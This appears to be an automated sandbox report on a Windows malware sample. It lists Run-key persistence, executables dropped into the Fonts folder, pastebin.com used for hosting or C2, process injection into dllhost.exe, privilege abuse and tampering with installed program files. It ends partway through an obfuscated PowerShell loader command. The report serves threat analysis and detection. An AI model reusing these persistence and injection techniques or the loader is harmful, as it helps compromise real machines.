bdaejec | 1c74716aa959672f89ca6a090cf8aee85eee235980f00cf4a1f049b265b4a836

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Powershell.exewww.msedge.exeREHQDPN.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	www.msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	REHQDPN.exe

Executes dropped EXE 4 IoCs

Processes:

Powershell.exewww.msedge.exewww.DeadSec0000000000-obfusecator.exeREHQDPN.exe

pid	Process
1052	Powershell.exe
452	www.msedge.exe
4808	www.DeadSec0000000000-obfusecator.exe
1692	REHQDPN.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Powershell.exewww.msedge.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.msedge = "C:\\Windows\\Fonts\\www.msedge.exe"	Powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\Windows\\Fonts\\www.DeadSec0000000000-obfusecator.exe"	Powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.MsEgeServ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\www.MsEgeServ.com"	www.msedge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
40	pastebin.com
41	pastebin.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXEsvchost.exe

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\www.MsEgeServ	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description	pid	Process	procid_target
PID 2632 set thread context of 1428	2632	powershell.EXE	113

Drops file in Program Files directory 64 IoCs

Processes:

REHQDPN.exe

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBridge\SkypeBridge.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	REHQDPN.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoev.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\unpack200.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\PilotshubApp.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\TCUI-App.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\kinit.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Windows Mail\wabmig.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{1E8F5DDF-3FB3-4332-A4CC-B46FF6E6899A}\chrome_installer.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\StoreExperienceHost.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	REHQDPN.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jjs.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoasb.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	REHQDPN.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe	REHQDPN.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe	REHQDPN.exe

Drops file in Windows directory 4 IoCs

Processes:

Powershell.exe

description	ioc	Process
File created	C:\Windows\Fonts\www.msedge.exe	Powershell.exe
File opened for modification	C:\Windows\Fonts\www.msedge.exe	Powershell.exe
File created	C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe	Powershell.exe
File opened for modification	C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe	Powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

ME77ZTVpfPe1.exepowershell.exewww.DeadSec0000000000-obfusecator.exeREHQDPN.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ME77ZTVpfPe1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	www.DeadSec0000000000-obfusecator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	REHQDPN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
3616	schtasks.exe
400	schtasks.exe
4528	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4796	powershell.exe
4796	powershell.exe
1832	powershell.exe
1832	powershell.exe
1832	powershell.exe
484	powershell.exe
484	powershell.exe
484	powershell.exe
2632	powershell.EXE
2632	powershell.EXE
2632	powershell.EXE
2632	powershell.EXE
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
1428	dllhost.exe
1428	dllhost.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe
1428	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeME77ZTVpfPe1.exepowershell.exewww.msedge.exepowershell.exepowershell.EXEdllhost.exepowershell.exeExplorer.EXEpowershell.exepowershell.exedwm.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	4408	ME77ZTVpfPe1.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	452	www.msedge.exe
Token: SeDebugPrivilege	484	powershell.exe
Token: SeDebugPrivilege	2632	powershell.EXE
Token: SeDebugPrivilege	2632	powershell.EXE
Token: SeDebugPrivilege	1428	dllhost.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	384	dwm.exe
Token: SeCreatePagefilePrivilege	384	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ME77ZTVpfPe1.exePowershell.exewww.DeadSec0000000000-obfusecator.exepowershell.EXEdllhost.exe

description	pid	Process	procid_target
PID 4408 wrote to memory of 4796	4408	ME77ZTVpfPe1.exe	90
PID 4408 wrote to memory of 4796	4408	ME77ZTVpfPe1.exe	90
PID 4408 wrote to memory of 4796	4408	ME77ZTVpfPe1.exe	90
PID 4408 wrote to memory of 1052	4408	ME77ZTVpfPe1.exe	99
PID 4408 wrote to memory of 1052	4408	ME77ZTVpfPe1.exe	99
PID 1052 wrote to memory of 1832	1052	Powershell.exe	100
PID 1052 wrote to memory of 1832	1052	Powershell.exe	100
PID 1052 wrote to memory of 3616	1052	Powershell.exe	102
PID 1052 wrote to memory of 3616	1052	Powershell.exe	102
PID 1052 wrote to memory of 452	1052	Powershell.exe	104
PID 1052 wrote to memory of 452	1052	Powershell.exe	104
PID 1052 wrote to memory of 484	1052	Powershell.exe	105
PID 1052 wrote to memory of 484	1052	Powershell.exe	105
PID 1052 wrote to memory of 400	1052	Powershell.exe	107
PID 1052 wrote to memory of 400	1052	Powershell.exe	107
PID 1052 wrote to memory of 4808	1052	Powershell.exe	109
PID 1052 wrote to memory of 4808	1052	Powershell.exe	109
PID 1052 wrote to memory of 4808	1052	Powershell.exe	109
PID 4808 wrote to memory of 1692	4808	www.DeadSec0000000000-obfusecator.exe	110
PID 4808 wrote to memory of 1692	4808	www.DeadSec0000000000-obfusecator.exe	110
PID 4808 wrote to memory of 1692	4808	www.DeadSec0000000000-obfusecator.exe	110
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 2632 wrote to memory of 1428	2632	powershell.EXE	113
PID 1428 wrote to memory of 628	1428	dllhost.exe	5
PID 1428 wrote to memory of 680	1428	dllhost.exe	7
PID 1428 wrote to memory of 960	1428	dllhost.exe	12
PID 1428 wrote to memory of 384	1428	dllhost.exe	13
PID 1428 wrote to memory of 740	1428	dllhost.exe	14
PID 1428 wrote to memory of 868	1428	dllhost.exe	15
PID 1428 wrote to memory of 1092	1428	dllhost.exe	17
PID 1428 wrote to memory of 1100	1428	dllhost.exe	18
PID 1428 wrote to memory of 1144	1428	dllhost.exe	19
PID 1428 wrote to memory of 1188	1428	dllhost.exe	20
PID 1428 wrote to memory of 1216	1428	dllhost.exe	21
PID 1428 wrote to memory of 1320	1428	dllhost.exe	22
PID 1428 wrote to memory of 1336	1428	dllhost.exe	23
PID 1428 wrote to memory of 1356	1428	dllhost.exe	24
PID 1428 wrote to memory of 1492	1428	dllhost.exe	25
PID 1428 wrote to memory of 1556	1428	dllhost.exe	26
PID 1428 wrote to memory of 1572	1428	dllhost.exe	27
PID 1428 wrote to memory of 1672	1428	dllhost.exe	28
PID 1428 wrote to memory of 1712	1428	dllhost.exe	29
PID 1428 wrote to memory of 1744	1428	dllhost.exe	30
PID 1428 wrote to memory of 1780	1428	dllhost.exe	31
PID 1428 wrote to memory of 1820	1428	dllhost.exe	32
PID 1428 wrote to memory of 1968	1428	dllhost.exe	33
PID 1428 wrote to memory of 1984	1428	dllhost.exe	34
PID 1428 wrote to memory of 1996	1428	dllhost.exe	35
PID 1428 wrote to memory of 1408	1428	dllhost.exe	36
PID 1428 wrote to memory of 2124	1428	dllhost.exe	37
PID 1428 wrote to memory of 2196	1428	dllhost.exe	39
PID 1428 wrote to memory of 2224	1428	dllhost.exe	40
PID 1428 wrote to memory of 2232	1428	dllhost.exe	41
PID 1428 wrote to memory of 2436	1428	dllhost.exe	42
PID 1428 wrote to memory of 2444	1428	dllhost.exe	43
PID 1428 wrote to memory of 2620	1428	dllhost.exe	44
PID 1428 wrote to memory of 2648	1428	dllhost.exe	45
PID 1428 wrote to memory of 2716	1428	dllhost.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d577e440-774b-4dae-b112-1fa244bcd54a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1428

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1144
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DkvrtYzMINMC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CofLyMqMdsgoFI,[Parameter(Position=1)][Type]$WLktYNWdvy)$qXksweqzRwM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 